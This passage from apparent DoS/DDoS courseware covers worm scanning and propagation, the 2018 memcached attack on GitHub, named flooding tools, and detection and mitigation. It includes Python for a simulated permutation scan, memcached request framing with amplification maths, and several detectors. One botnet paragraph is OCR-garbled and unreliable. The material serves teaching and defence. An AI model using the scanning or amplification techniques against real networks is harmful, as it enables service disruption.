  This technique uses the information obtained from an infected machine to find new vulnerable machines. An infected host checks for URLs in the hard drive of a machine that it wants to infect. Subsequently, it shortlists URLs and targets, and it checks their vulnerability. This technique yields accurate results, and its performance is similar to that of the hit-list scanning technique.

• Local Subnet Scanning
  In this technique, an infected machine searches for new vulnerable machines in its local network, behind a firewall, by using the information hidden in the local addresses. Attackers use this technique in combination with other scanning mechanisms.

• Permutation Scanning
  In this technique, attackers share a common pseudorandom permutation list of IP addresses of all machines. The list is created using a block cipher of 32 bits and a preselected key. If a compromised host is infected during either hit-list scanning or local subnet scanning, the list is scanned from immediately after the point of the compromised host to identify new targets. If a compromised host is infected during permutation scanning, scanning restarts from a random point. If an already infected machine is encountered, scanning restarts from a new random start point in the permutation list. The process of scanning stops when the compromised host consecutively encounters a predefined number of already infected machines and fails to find new targets. Thereafter, a new permutation key is generated to initiate a new scanning phase.

  Permutation scanning has the following advantages:
  ◦ The reinfection of a target is avoided.
  ◦ New targets are scanned at random, thereby ensuring a high scanning speed.
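The permutation list is the interesting part: a keyed block-cipher permutation lets every infected host walk the same pseudorandom order of the address space without coordinating, which is what avoids reinfection. The Python below is an added example, not courseware code, and is a simulation over integers only: a Feistel permutation built from HMAC-SHA256 stands in for the 32-bit block cipher, and the scan runs over a reduced address space so it finishes instantly. The construction, round count, address-space size, stop threshold, and the constructed set of vulnerable hosts are assumptions for the example.

```python
"""Permutation scanning simulated with a keyed block-cipher permutation.

Added example, not courseware code.  The Feistel construction (HMAC-SHA256
round function, 4 rounds), the reduced address-space size and the stop
threshold are assumptions; the courseware only states a 32-bit block cipher
with a preselected key.  Nothing here touches a network."""
import hashlib
import hmac
import random


def _round(half, key, rnd, half_bits):
    """Round function: keyed hash of (round number, half block), truncated."""
    msg = bytes([rnd]) + half.to_bytes(4, "big")
    digest = hmac.new(key, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big") & ((1 << half_bits) - 1)


def permute(x, key, bits=32, rounds=4):
    """Keyed bijection on [0, 2**bits): list position x -> address."""
    hb = bits // 2
    mask = (1 << hb) - 1
    l, r = x >> hb, x & mask
    for rnd in range(rounds):
        l, r = r, l ^ _round(r, key, rnd, hb)
    return (l << hb) | r


def unpermute(y, key, bits=32, rounds=4):
    """Inverse of permute: address -> its position in the list."""
    hb = bits // 2
    mask = (1 << hb) - 1
    l, r = y >> hb, y & mask
    for rnd in reversed(range(rounds)):
        l, r = r ^ _round(l, key, rnd, hb), l
    return (l << hb) | r


def sample_vulnerable(n=40, bits=12, seed=7):
    """Constructed population of vulnerable addresses in the reduced space."""
    return set(random.Random(seed).sample(range(1 << bits), n))


def simulate(vulnerable, key, bits, stop_after, seed=1):
    """The first host (found by a hit list) scans from just after its own
    position; every host found by permutation scanning starts at a random
    point, jumps to a new random point whenever it meets an already infected
    host, and stops after `stop_after` such encounters in a row.
    Returns (infected set, total probes, encounters with infected hosts)."""
    rng = random.Random(seed)
    size = 1 << bits
    infected = set()
    probes = encounters = 0
    first = rng.choice(sorted(vulnerable))
    infected.add(first)
    queue = [unpermute(first, key, bits)]
    while queue:
        pos = queue.pop()
        misses = 0
        while misses < stop_after:
            pos = (pos + 1) % size
            addr = permute(pos, key, bits)
            probes += 1
            if addr in infected:
                misses += 1
                encounters += 1
                pos = rng.randrange(size)       # restart from a new random point
            elif addr in vulnerable:
                infected.add(addr)              # never probed as a target again
                misses = 0
                queue.append(rng.randrange(size))
    return infected, probes, encounters


if __name__ == "__main__":
    vuln = sample_vulnerable()
    hosts, probes, enc = simulate(vuln, b"phase-1-key", bits=12, stop_after=3)
    print(f"{len(hosts)}/{len(vuln)} vulnerable hosts infected in {probes} probes,"
          f" {enc} encounters with already infected hosts")
```

Because permute is a bijection, a walker starting at any position visits every address exactly once before wrapping, so two walkers only collide when one reaches ground the other has already covered, which is exactly the signal the stop rule uses. Changing the key reshuffles the order for the next scanning phase, as the passage describes. For a defender, the observable is the opposite of random scanning: each source probes a spread of addresses with no repeats, and distinct sources never probe the same address twice.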

How Does Malicious Code Propagate?

Attackers use three techniques to propagate malicious code to newly discovered vulnerable systems. Discussed below are the three techniques used by an attacker to propagate malicious code and build attack networks:
• Central Source Propagation
  In this technique, the attacker places an attack toolkit on a central source, and a copy of the attack toolkit is transferred to a newly discovered vulnerable system. Once the attacker finds a vulnerable machine, they instruct the central source to transfer a copy of the attack toolkit to the newly compromised machine, on which attack tools are automatically installed under management by a scripting mechanism. This initiates a new attack cycle, in which the newly infected machine searches for other vulnerable machines and repeats the process to install the attack toolkit. In general, this technique uses HTTP, FTP, and RPC protocols.

  Figure 10.20: Central source propagation (attacker, central source, victim, next victim)

• Back-chaining Propagation
  In this technique, the attacker places an attack toolkit on their own system, and a copy of the attack toolkit is transferred to a newly discovered vulnerable system. The attack tools installed on the attacking machine use some special methods to accept a connection from the compromised system and then transfer a file containing the attack tools to it. Simple port listeners containing a copy of this file or full intruder-installed web servers, both of which use the Trivial File Transfer Protocol (TFTP), support this back-channel file copy.

  Figure 10.21: Back-chaining propagation (repeated from each victim to the next)

• Autonomous Propagation
  Unlike the previously discussed mechanisms, in which an external file source transfers the attack toolkit, in autonomous propagation, the attacking host itself transfers the attack toolkit to a newly discovered vulnerable system, exactly at the time it breaks into that system.

  Figure 10.22: Autonomous propagation (the attacker exploits and copies code to the victim, which does the same to the next victim)

Module Flow

DDoS Case Study

DDoS attacks are sophisticated and complex attacks based on DoS and multiple distributed attack sources. In a DDoS attack, a large number of compromised computers (zombies) interrupt or suspend network services. This section presents a case study of a DDoS attack.

DDoS Attack

In a DDoS attack, attackers use a group of compromised systems (bots or zombies), usually infected with Trojans, to perform a DoS attack on a target system or network resource.

Figure 10.23: DDoS attack scenario

As shown in the figure, in an anonymous networking attack scenario, a hacker hosts a High Orbit Ion Cannon (HOIC) DDoS attack tool on a web server they own or on a compromised web server. The hacker then advertises the HOIC DDoS attack tool on social sites or search engines such as Twitter, Facebook, and Google with a malicious download link.

Users who desire to perform the DDoS attack may download the HOIC DDoS attack tool by clicking on the malicious download link provided by the hacker. These users are termed "volunteers." All the volunteers connect anonymously via an IRC channel to the hacker and await instructions to proceed further. The hacker instructs the volunteers to flood the target web server (e.g., PayPal, MasterCard, and PAYBACK) with multiple requests. On receiving instructions, the volunteers act accordingly. Consequently, the target server becomes overwhelmed and stops responding to requests from even legitimate users.

HackersAdvertise Links for Downloading
Botnets

& warnine!
$1,000 Gift Card
Amazon’

HackersAdvertiseLinks for Downloading


Botnets
Hackersadvertisebotnetson various blogs, searchengines, socialnetworking sites,emails,and
so on with download
Into downloading
alsouse fakeupdates
links.Hackers
the malware.Theintention i n doing
and
security
alerts
so is to spread
the size of the attacknetwork.Thismethodof attackis very quick
to trickthevictim
the botnetand increase
and effective.The below
figureshowsexamples foradshostedbyhackerso n the Internetto downloadbotnets.

A warnine!
$1,000 GiftCard
Amazon’
2
MAC MalwarewarningAlert

Use of Mobile Devices as Botnets for Launching DDoS Attacks
Android devices are passively vulnerable to various malware such as Trojans, bots, Remote Access Trojans (RATs), and so on, which are often found in third-party application stores. These unsecured Android devices are becoming the primary targets for attackers to enlarge their botnet network because they are highly vulnerable to malware. Malicious Android applications found in the Google Play Store and drive-by downloads are examples of infection methods. The attacker binds a malicious server to the Android application package (APK) file, encrypts it, and removes unwanted features and permissions before distributing the malicious package through an app store such as the Google Play Store or a third-party store. Once the victims are tricked into downloading and installing such applications, the victim's device is taken over by the attacker and integrated into the attacker's mobile botnet to perform malicious activities such as DDoS attacks and web injections.

DDoS Case Study: DDoS Attack on GitHub
Source: https://github.blog
GitHub is a renowned open-source cloud platform used as a code repository by many companies, businesses, and researchers with wide areas of interest. In February 2018, GitHub encountered a devastating DDoS attack, which made its service unavailable to users for about 4 min. At the time, this was the largest DDoS attack ever recorded.
Attack Timeline
The DDoS attack occurred on Wednesday, February 28, 2018. This volumetric DDoS attack made GitHub.com unavailable from 17:21 to 17:26 UTC and intermittently unavailable from 17:26 to 17:30 UTC. At 17:21 UTC, GitHub's network monitoring system detected an anomaly in the ratio of ingress to egress traffic, owing to a heavy inflow of data packets, and notified the on-call engineer and others. The below figure shows inbound versus outbound throughput over transit links.

Figure 10.25: Inbound versus outbound throughput over transit links

The first portion of the attack peaked at 1.35 Tbps via 126.9 million packets per second (pps), and a second 400 Gbps spike occurred a little after 18:00 UTC. The below figure, provided by Akamai, shows inbound traffic in bits per second (bps).
Figure 10.26: Inbound traffic in bits per second

Attack Mechanism
This attack was an amplification attack using a Memcached-based approach that peaked at 1.35 Tbps. The attack originated from over a thousand different autonomous system numbers (ASNs) across tens of thousands of unique endpoints. The attack worked by abusing Memcached instances that were inadvertently accessible on the public Internet with UDP support enabled. Because UDP involves no handshake, the attacker could spoof the source IP address of each request as the victim's address; the Memcached servers then sent their responses to the victim rather than to the attacker, and because a response is far larger than the request that triggers it, far more data was sent toward the target than the attacker itself had to send. This misconfiguration gave an amplification factor of up to 51,000, meaning that up to 51 KB was sent toward the target for each byte sent by the attacker. This large amplification factor caused the devastating inflow of 1.35 Tbps of data toward GitHub, interrupting its normal operations.
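The amplification arithmetic behind this mechanism, and a flow-level check for the same reflection pattern, as an added Python example written for this page (it is not code from the original text or from GitHub's report). The memcached UDP frame format is the real one; the 765 kB response size, the 1000-bytes-per-packet threshold, and the flow records are constructed assumptions:

```python
"""Memcached UDP reflection: the amplification arithmetic behind the attack
described above, and a flow-record check for reflected traffic.

Added example written for this page; it is not code from the original text
or from GitHub's incident report. The flow records and the 765 kB response
size are constructed for illustration, not measurements of a real server.
"""
import struct
from collections import defaultdict

MEMCACHED_PORT = 11211                 # memcached's default port, TCP and UDP
REFLECTION_MIN_BYTES_PER_PKT = 1000    # assumed: reflected replies run near MTU size


def memcached_udp_request(command: bytes, request_id: int = 0) -> bytes:
    """Build one memcached UDP datagram: an 8-byte frame header followed by
    the ASCII command. Header fields (big-endian 16-bit): request id,
    sequence number, total datagrams in the message, reserved (0)."""
    header = struct.pack("!HHHH", request_id, 0, 1, 0)
    return header + command + b"\r\n"


def amplification_factor(request: bytes, response_bytes: int) -> float:
    """Bytes the reflector emits for every byte the attacker sends. With the
    request's source address spoofed to the victim, every response byte lands
    on the victim instead of on the attacker."""
    return response_bytes / len(request)


def attacker_rate_needed_bps(victim_bps: float, factor: float) -> float:
    """Uplink the attacker needs in order to deliver victim_bps at this factor."""
    return victim_bps / factor


def find_reflection_targets(flows, min_bytes_per_pkt=REFLECTION_MIN_BYTES_PER_PKT):
    """Pick out UDP flows whose *source* port is 11211 (replies leaving
    memcached servers) with a large average packet size, and group them by
    destination. A victim appears as one destination fed by many reflectors.

    flows: iterable of (src_ip, src_port, dst_ip, dst_port, proto, bytes, packets)
    returns: {victim_ip: {"reflectors": n, "bytes": total, "packets": total}}
    """
    by_victim = defaultdict(lambda: {"reflectors": set(), "bytes": 0, "packets": 0})
    for src_ip, src_port, dst_ip, _dst_port, proto, nbytes, npkts in flows:
        if proto != "udp" or src_port != MEMCACHED_PORT or npkts == 0:
            continue
        if nbytes / npkts < min_bytes_per_pkt:
            continue                       # small replies: normal client traffic
        entry = by_victim[dst_ip]
        entry["reflectors"].add(src_ip)
        entry["bytes"] += nbytes
        entry["packets"] += npkts
    return {v: {"reflectors": len(e["reflectors"]), "bytes": e["bytes"],
                "packets": e["packets"]} for v, e in by_victim.items()}


# Constructed sample records (documentation address ranges): three memcached
# servers reflecting toward one victim, a DNS reply stream (wrong port) and a
# normal memcached exchange (small packets); the last two must not match.
SAMPLE_FLOWS = [
    ("198.51.100.10", 11211, "203.0.113.5", 40000, "udp", 1_400_000, 1000),
    ("198.51.100.11", 11211, "203.0.113.5", 40000, "udp", 1_380_000, 1000),
    ("198.51.100.12", 11211, "203.0.113.5", 40000, "udp", 1_420_000, 1000),
    ("192.0.2.7",        53, "203.0.113.5", 51515, "udp",    12_000,  100),
    ("192.0.2.9",     11211, "203.0.113.8", 52000, "udp",       300,    3),
]

if __name__ == "__main__":
    req = memcached_udp_request(b"get a")            # 15 bytes on the wire
    factor = amplification_factor(req, 765_000)      # assumed 765 kB reply
    print(f"amplification: x{factor:.0f}")
    print(f"attacker uplink for 1.35 Tbps at the victim: "
          f"{attacker_rate_needed_bps(1.35e12, factor) / 1e6:.1f} Mbps")
    print(find_reflection_targets(SAMPLE_FLOWS))
```

The last figure is the practical lesson of the case: at a 51,000x factor, an attacker needs only a few tens of megabits per second of spoofed requests to produce a terabit-scale flood, which is why closing UDP on memcached and filtering spoofed sources (covered under countermeasures later in this module) matter more than absorbing the flood at the victim.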
Response
Given the increase in inbound transit bandwidth to over 100 Gbps in one of GitHub's facilities, GitHub personnel decided to move the incoming traffic to Akamai. At 17:26 UTC, a command was initiated via GitHub's ChatOps tooling to withdraw Border Gateway Protocol (BGP) announcements over transit providers and announce AS36459, the autonomous system belonging to GitHub, exclusively over GitHub's links to Akamai. Routes reconverged in the next few minutes, and access control lists mitigated the attack at Akamai's border. The monitoring of transit bandwidth levels and load balancer response codes indicated a full recovery at 17:30 UTC. At 17:34 UTC, routes to Internet exchanges were withdrawn as a follow-up to shift an additional 40 Gbps away from GitHub's network.

Figure 10.27: Inbound versus outbound throughput over transit links

After this incident, GitHub revealed that they were investigating the use of their monitoring infrastructure to automatically engage DDoS mitigation providers and would continue to measure response times to similar incidents with the goal of reducing the mean time to recovery (MTTR).

DoS/DDoS Attack Tools
This section deals with various DoS/DDoS attack tools used to take over a single or multiple network systems to exhaust their computing resources or render them unavailable to their intended users.

DoS/DDoS Attack Tools

High Orbit Ion Cannon (HOIC)
Source: https://sourceforge.net
HOIC is a network stress and DoS/DDoS attack application written in BASIC. It is designed to attack up to 256 target URLs simultaneously. It sends HTTP POST and GET requests to a target computer and uses lulz-inspired GUIs. Its features are summarized as follows:
- High-speed multi-threaded HTTP flooding
- Simultaneous flooding of up to 256 websites
- Built-in scripting system to allow the deployment of "boosters," which are scripts designed to thwart DDoS countermeasures and increase DoS output
- Portability to Linux/Mac with a few bug fixes
- Ability to select the number of threads in an ongoing attack
- Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH

Figure 10.28: Screenshot of HOIC DoS attack tool
Low Orbit Ion Cannon (LOIC)
Source: https://sourceforge.net
LOIC is a network stress testing and DoS attack application. LOIC attacks can be called application-based DoS attacks because they primarily target web applications. LOIC can be used on a target site to flood the server with TCP packets, UDP packets, or HTTP requests with the intention of disrupting the service.

Figure 10.29: Screenshot of LOIC DoS attack tool

The following are some of the additional DoS/DDoS attack tools:
- XOIC (http://anonhacktivism.blogspot.com)
- HULK (https://siberianlaika.ru)
- Tor's Hammer (https://sourceforge.net)
- Slowloris (https://github.com)
- PyLoris (https://sourceforge.net)
- R-U-Dead-Yet (https://sourceforge.net)

DoS and DDoS Attack Tools for Mobiles
LOIC
Source: https://play.google.com
The Android version of LOIC is used for flooding packets, which allows the attacker to perform a DDoS attack on the target organization. This application can perform UDP, HTTP, or TCP flood attacks.

Figure 10.30: Screenshot of LOIC DoS attack tool for mobile

AnDOSid
Source: https://andosid.droidinformer.org
AnDOSid allows the attacker to simulate a DoS attack (an HTTP POST flood attack, to be precise) and a DDoS attack on a web server from mobile phones.
Figure 10.31: Screenshot of AnDOSid DoS attack tool for mobile
Packets Generator
Source: https://play.google.com
The Packets Generator app allows attackers to generate network traffic including TCP SYN, UDP, and ICMP ping traffic. It is effectively used for testing a firewall's filtering rules, an intrusion detection system's attack signatures, and a router's access-control lists (ACLs) by sending a series of generated packets towards a target.

Figure 10.32: Screenshot of Packets Generator tool for mobile
Countermeasures
DoS/DDoS is one of the foremost security threats on the Internet; thus, there is a great necessity for solutions to mitigate these attacks. This section discusses detection methods, various preventive measures, and responses to DoS/DDoS attacks.

Detection Techniques
Early detection techniques help prevent DoS/DDoS attacks. Detecting a DoS/DDoS attack is a tricky task. A DoS/DDoS attack traffic detector needs to distinguish between a genuine and a bogus data packet, which is not always possible. Therefore, the techniques employed for this purpose are not perfect. There is always a chance of confusion between traffic generated by a legitimate network user and traffic generated by a DoS/DDoS attack. Detection techniques are based on identifying an illegitimate traffic increase and discriminating it from legitimate packet traffic, including flash events (sudden surges of legitimate demand).

One problem in filtering bogus traffic from legitimate traffic is the volume of traffic. It is impossible to scan each data packet to ensure security from a DoS/DDoS attack. All the detection techniques used today define an attack as an abnormal and noticeable deviation in network traffic statistics and characteristics. These techniques involve the statistical analysis of deviations to categorize malicious and genuine traffic. The following are the three types of detection techniques:

Activity Profiling
Activity profiling is performed based on the average packet rate for a network flow, which consists of consecutive packets with similar packet header information. The packet header information includes the IP addresses of the destination and sender, ports, and transport protocols used. An attack is indicated by:
- An increase in activity levels among the network flow clusters
- An increase in the overall number of distinct clusters (DDoS attack)

For a flow with a higher average packet rate or activity level, the time between consecutive matching packets is lower. Randomness in the average packet rate or activity level can indicate suspicious activity. The entropy calculation method measures randomness in activity levels; if a network is under attack, the entropy of network activity levels increases.
One of the major hurdles in the activity profiling method is the huge volume of traffic. This problem can be overcome by clustering packet flows with similar characteristics. Because DoS attacks generate a large number of very similar data packets, an increase in the average packet rate or an increase in the diversity of packets (for example, many new source addresses) could indicate a DoS attack.

Sequential Change-Point Detection
In the sequential change-point detection technique, network traffic is filtered by IP addresses, targeted port numbers, and communication protocols used, and the traffic flow data are stored in a graph that shows the traffic flow rate versus time. Change-point detection algorithms isolate changes in network traffic statistics and in traffic flow rate caused by attacks. If there is a drastic change in traffic flow rate, a DoS attack may be occurring.
This technique uses the cumulative sum (CUSUM) algorithm to identify and locate DoS attacks. The algorithm accumulates the deviations of the actual local average from the expected local average in the traffic time series and raises an alarm when the accumulated deviation exceeds a threshold. The sequential change-point detection technique also identifies the typical scanning activities of network worms.
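The two statistical tests described above, source-address entropy for activity profiling and a one-sided CUSUM change-point test on the packet rate, as an added Python example written for this page (not code from the original text). The packet-rate series and per-source packet counts are constructed; the allowance `k` and threshold `h` are assumed tuning values an operator would set per link:

```python
"""Two statistical detectors from this section: source-address entropy for
activity profiling and a one-sided CUSUM change-point test on the packet rate.

Added example written for this page, not code from the original text. The
packet-rate series and the per-source packet counts are constructed; the
allowance k and threshold h are assumptions an operator would tune per link.
"""
import math
from collections import Counter


def shannon_entropy(counts: Counter) -> float:
    """Entropy in bits of the distribution behind `counts`, e.g. packets per
    source address in one time window. Equal counts over N sources give log2(N)."""
    total = sum(counts.values())
    return -sum((c / total) * math.log2(c / total) for c in counts.values() if c)


def baseline_mean(rates, n: int) -> float:
    """Expected rate mu, taken from the first n samples (assumed attack-free)."""
    return sum(rates[:n]) / n


def cusum_alarm(rates, mu: float, k: float, h: float):
    """One-sided CUSUM on a rate series:
        S_t = max(0, S_{t-1} + (x_t - mu - k)),  alarm when S_t > h
    k (allowance) absorbs normal jitter so S_t stays at 0 on quiet links;
    h (threshold) trades detection delay against false alarms.
    Returns (index of first alarm or None, list of S_t)."""
    s, scores, alarm = 0.0, [], None
    for i, x in enumerate(rates):
        s = max(0.0, s + (x - mu - k))
        scores.append(s)
        if alarm is None and s > h:
            alarm = i
    return alarm, scores


# Constructed packets-per-second samples: 15 normal readings, then a flood.
RATES = [100, 102, 98, 101, 99, 100, 103, 97, 100, 101,
         99, 100, 102, 98, 100, 350, 420, 480, 500, 510]
K_ALLOWANCE, H_THRESHOLD = 20.0, 300.0   # assumed tuning for this link

# Constructed per-source packet counts for two one-second windows: four
# regular clients, then 64 distinct (spoofed) sources sending one packet each.
NORMAL_WINDOW = Counter({"203.0.113.10": 25, "203.0.113.11": 25,
                         "203.0.113.12": 25, "203.0.113.13": 25})
ATTACK_WINDOW = Counter({f"198.51.100.{i}": 1 for i in range(64)})


def detect_flood(rates=RATES, baseline_n=10, k=K_ALLOWANCE, h=H_THRESHOLD):
    """Return the sample index at which CUSUM first alarms, or None."""
    mu = baseline_mean(rates, baseline_n)
    alarm, _ = cusum_alarm(rates, mu, k, h)
    return alarm


if __name__ == "__main__":
    print("normal-window source entropy:", shannon_entropy(NORMAL_WINDOW), "bits")
    print("attack-window source entropy:", shannon_entropy(ATTACK_WINDOW), "bits")
    print("CUSUM alarm at sample index:", detect_flood())
```

On the constructed series the flood starts at index 15 and CUSUM alarms one sample later, at index 16: the first attack sample alone does not push the score past `h`, which is the deliberate trade-off against alarming on a single spike. The entropy jump from 2 bits to 6 bits is the "increase in the diversity of packets" the text describes; a flood from a single unspoofed source would instead drive source entropy toward 0, so both directions of change are worth alerting on.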
Wavelet-Based Signal Analysis
The wavelet analysis technique analyzes network traffic in terms of spectral components. It divides incoming signals into various frequencies and analyzes different frequency components separately. Analyzing each spectral window's energy reveals the presence of anomalies. These techniques check the frequency components present at a specific time and provide a description of those components. The presence of an unfamiliar frequency indicates suspicious network activity.
A network signal consists of a time-localized data packet flow signal and background noise. Wavelet-based signal analysis filters out the input signals of anomalous traffic flow from background noise. Normal network traffic is generally low-frequency traffic. During an attack, the high-frequency components of the signal increase.

DoS/DDoS Countermeasure Strategies
- Absorbing the Attack: In this strategy, additional capacity is used to absorb an attack, which requires preplanning. It also requires additional resources. One disadvantage associated with this strategy is the cost of the additional resources, which is incurred even when no attacks are underway.
- Degrading Services: If it is not possible to keep all services functioning during an attack, it is a good idea to keep at least the critical services functional. For this, the critical services are first identified, following which the network, system, and application designs are customized to cut down the noncritical services. This strategy may help keep the critical services functional.
- Shutting Down Services: In this strategy, all services are shut down until an attack has subsided. Though it may not be the ideal choice, it may be a reasonable response in some cases.

DDoS Attack Countermeasures
Many solutions have been proposed for mitigating the effects of a DDoS attack. However, no single complete solution exists that can protect against all known forms of DDoS attacks. Moreover, attackers continually devise new methods to perform DDoS attacks that bypass the security solutions employed. The following are examples of DDoS countermeasures:
- Protect secondary victims
- Detect and neutralize handlers
- Prevent potential attacks
- Deflect attacks
- Mitigate attacks
- Post-attack forensics

Protect Secondary Victims and Detect and Neutralize Handlers
Protect Secondary Victims
Individual Users
The best method to prevent DDoS attacks is for secondary victim systems to prevent themselves from taking part in the attack. This demands intensified security awareness and prevention techniques. Secondary victims must regularly monitor their security to remain protected from DDoS agent software. It must be ensured that the system does not install any DDoS agent program; further, DDoS agent traffic must not be transferred into the network.
Antivirus and anti-Trojan software must be installed and updated regularly, as must software patches that fix known vulnerabilities. Moreover, awareness of security issues and prevention techniques must be increased among all Internet users. It is important to disable unnecessary services, uninstall unused applications, and scan all files received from external sources. Because these tasks may appear daunting to the average web user, the core hardware and software of computing systems come with integrated mechanisms that defend against malicious code insertion. Therefore, the built-in defensive mechanisms in the core hardware and software of the systems must be properly configured and regularly updated to avoid DDoS attacks. Employing the above countermeasures will leave attackers with no DDoS attack network through which they can launch DDoS attacks.

Network Service Providers
Service providers and network administrators can adopt dynamic pricing for their network usage to charge potential secondary victims for accessing the Internet and thereby encourage them to become more active in preventing themselves from becoming a part of a DDoS attack.
Detect and Neutralize Handlers
An important method used to stop DDoS attacks is to detect and neutralize handlers. This can be achieved by network traffic analysis, neutralizing botnet handlers, and identifying spoofed source addresses. In the agent-handler DDoS attack-tool arsenal, the handler works as an intermediary for the attacker to initiate attacks. Analyzing communication protocols and traffic patterns between handlers and clients or handlers and agents can reveal the network nodes infected by the handlers. Discovering the handlers in the network and disabling them can be a quick method of disrupting the DDoS attack network. Because the number of DDoS handlers deployed in the network is much less than the number of agents, neutralizing a few handlers can possibly render multiple agents useless, thereby thwarting DDoS attacks.
Furthermore, there is a reasonable probability that the spoofed source address of DDoS attack packets will not be a valid source address for the sub-network the packet arrives from. Identifying spoofed source addresses, combined with a thorough comprehension of the communication protocols and traffic among handlers, clients, and agents, helps prevent DDoS attacks.

Prevent Potential Attacks
Egress Filtering
Egress filtering scans the headers of IP packets leaving a network. If the packets meet the specifications, they can be routed out of the sub-network from which they originated. On the other hand, the packets do not reach the targeted address if they fail to meet the necessary specifications. Egress filtering ensures that unauthorized or malicious traffic never leaves the internal network.
DDoS attacks generate spoofed IP addresses. Establishing protocols to require any legitimate packet that leaves a company's network to have a source address whose network portion matches the internal network can help mitigate attacks. A properly developed firewall for the sub-network can filter out many DDoS packets with spoofed IP source addresses.
If a web server is vulnerable to a zero-day attack known only to the underground hacker community, the server can be vulnerable even after applying all available patches. However, if the user enables egress filtering, they can preserve the integrity of the system by keeping the server from establishing a connection back to the attacker. This would also limit the effectiveness of many payloads used in common exploits. Outbound exposure can be restricted to the required traffic, thereby limiting the attacker's ability to connect to other systems and gain access to tools that can enable further access into the network.
Ingress Filtering
Ingress filtering is a packet filtering technique used by many Internet Service Providers (ISPs) to prevent source address spoofing of Internet traffic. Thus, ingress filtering can indirectly combat several types of net abuse by making Internet traffic traceable to its true source. It protects against flooding attacks that originate from valid prefixes (IP addresses) and enables the originator to be traced to its true source.
TCP Intercept

TCP intercept is a traffic-filtering feature in routers to protect TCP servers from a TCP SYN-flooding attack, which is a kind of DoS attack. In a SYN-flooding attack, the attacker sends a huge volume of connection requests with unreachable return addresses. As the addresses are not reachable, the connections cannot be established and remain unresolved. This huge volume of unresolved open connections overwhelms the server and may cause it to deny service even to valid requests. Consequently, legitimate users may not be able to connect to a website, access email, use an FTP service, and so on.
In the TCP intercept mode, a router intercepts the SYN packets sent by clients to a server and matches them against an extended access list. If a match is obtained, then on behalf of the destination server, the intercept software establishes a connection with the client. Similarly, the intercept software also establishes a connection with the destination server on behalf of the client. Once the two half connections are established, the intercept software combines them transparently. Thus, the TCP intercept software prevents fake connection attempts from reaching the server by acting as a mediator between the server and client throughout the connection.
Rate Limiting
Rate limiting is a technique used to control the rate of outbound or inbound traffic on a network interface controller. This technique effectively reduces the high volume of inbound traffic that causes a DDoS attack. It is especially important to employ this technique in hardware appliances, in which the technique is configured to limit the rate of requests on layers 4 and 5 of the Open Systems Interconnection (OSI) model.

Deflect Attacks
Systems set up with limited security, also known as honeypots, act as enticement for an attacker. Recent research reveals that a honeypot can imitate all aspects of a network, including its web servers, mail servers, and clients. Honeypots are intentionally set up with low security to gain the attention of DDoS attackers and serve as a means for gaining information about attackers, attack techniques, and tools by storing a record of the system activities. DDoS attackers attracted by a honeypot install handlers or agent code within the honeypot. This avoids compromising systems that are more sensitive. Honeypots not only protect the actual system from attackers but also keep track of details on the attackers' activities by recording the activity information. Consequently, the honeypot owner can keep a record of the handler and/or agent activity. Users can employ this knowledge to defend against any future DDoS installation attacks. A defense-in-depth approach with Internet Protocol Security (IPSec) can be used at different network points to divert suspicious DoS traffic to several honeypots.
There are two different types of honeypots:
- Low-interaction honeypots
- High-interaction honeypots
An example of a high-interaction honeypot is a honeynet. Honeynets simulate the complete layout of a network of computers but are intended for "capturing" attacks. The goal is to develop a network wherein all activities are controlled and tracked. This network contains potential victim decoys, and the network even has real computers running real applications.

KFSensor
Source: http://www.keyfocus.net
KFSensor is a Windows-based honeypot intrusion detection system (IDS). It acts as a honeypot designed to attract and detect hackers and worms by simulating vulnerable system services and Trojans. By responding with an emulation of a real service, KFSensor can reveal the nature of an attack while maintaining total control and avoiding the risk of compromise. By acting as a decoy server, it can divert attacks from critical systems and provide a higher level of information than can be achieved using firewalls and a network IDS (NIDS) alone.

Figure 10.33: Screenshot of KFSensor
The following are examples of additional DoS/DDoS countermeasure (honeypot) tools:
- SSHHiPot (https://github.com)
- Artillery (https://github.com)

Mitigate Attacks
Load Balancing
Bandwidth providers can increase bandwidth on critical connections in case of a DDoS attack to prevent their servers from shutting down. Using a replicated server model provides additional failsafe protection. Replicated servers help in better load management by balancing loads on each server in a multiple-server architecture; they also increase normal network performance and mitigate the effect of a DDoS attack.
Throttling
Throttling entails setting up routers for server access with logic to throttle incoming traffic to levels that are safe for the server. "Min-max fair server-centric router throttles" (minimum and maximum throughput controls) help users prevent their servers from shutting down. Throttling helps in preventing damage to servers by controlling the DoS traffic. This method helps routers manage heavy incoming traffic so that the server can handle it. It also filters legitimate user traffic from fake DDoS attack traffic and can be extended to throttle DDoS attack traffic while allowing legitimate user traffic for better results.
A major limitation of this method is that it may trigger false alarms. Occasionally, it may allow malicious traffic to pass through while dropping some legitimate traffic.
Drop Requests
Another method is to drop packets when the load increases. Usually, the router or server performs this task. However, before continuing with a request, the system induces the requester to drop the request by making them solve a difficult puzzle that requires a lot of memory or computing power. Consequently, users of zombie systems

detect a performance degradation and could possibly be dissuaded from taking part in transferring DDoS attack traffic.
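The "drop requests" puzzle described above, tied to the throttling idea from the same section, as an added Python example written for this page (not code from the original text): the server raises the puzzle difficulty with the overload ratio, a client must find a SHA-256 proof of work, and verification costs the server one HMAC and one hash whatever the difficulty. The server secret, the load figures, the one-minute time slot, and the 4-bits-per-doubling schedule are assumptions:

```python
"""Throttling through client puzzles: the "drop requests" countermeasure above,
where an overloaded server makes each requester spend CPU on a proof of work
before the request is accepted, so zombies feel the slowdown first.

Added example written for this page, not code from the original text. The
server secret, the load figures and the difficulty schedule are assumptions.
"""
import hashlib
import hmac
import math

SERVER_SECRET = b"assumed-secret-rotate-regularly"   # keep out of source control
MAX_BITS = 24            # cap so a legitimate client never waits too long
COUNTER_LEN = 8          # bytes appended to the challenge while searching


def difficulty_for_load(current_rps: float, normal_rps: float) -> int:
    """Puzzle difficulty in leading zero bits: 0 under normal load, then 4 bits
    (16x more work) per doubling of the overload ratio, capped at MAX_BITS."""
    if current_rps <= normal_rps:
        return 0
    return min(MAX_BITS, 4 * math.ceil(math.log2(current_rps / normal_rps)))


def challenge(client_id: str, slot: int) -> bytes:
    """Stateless challenge: HMAC over the client identity and a coarse time
    slot, so the server stores nothing per client and solutions expire with the slot."""
    msg = f"{client_id}|{slot}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()


def _meets_difficulty(digest: bytes, bits: int) -> bool:
    """True when the SHA-256 digest starts with at least `bits` zero bits."""
    bits = min(bits, 256)
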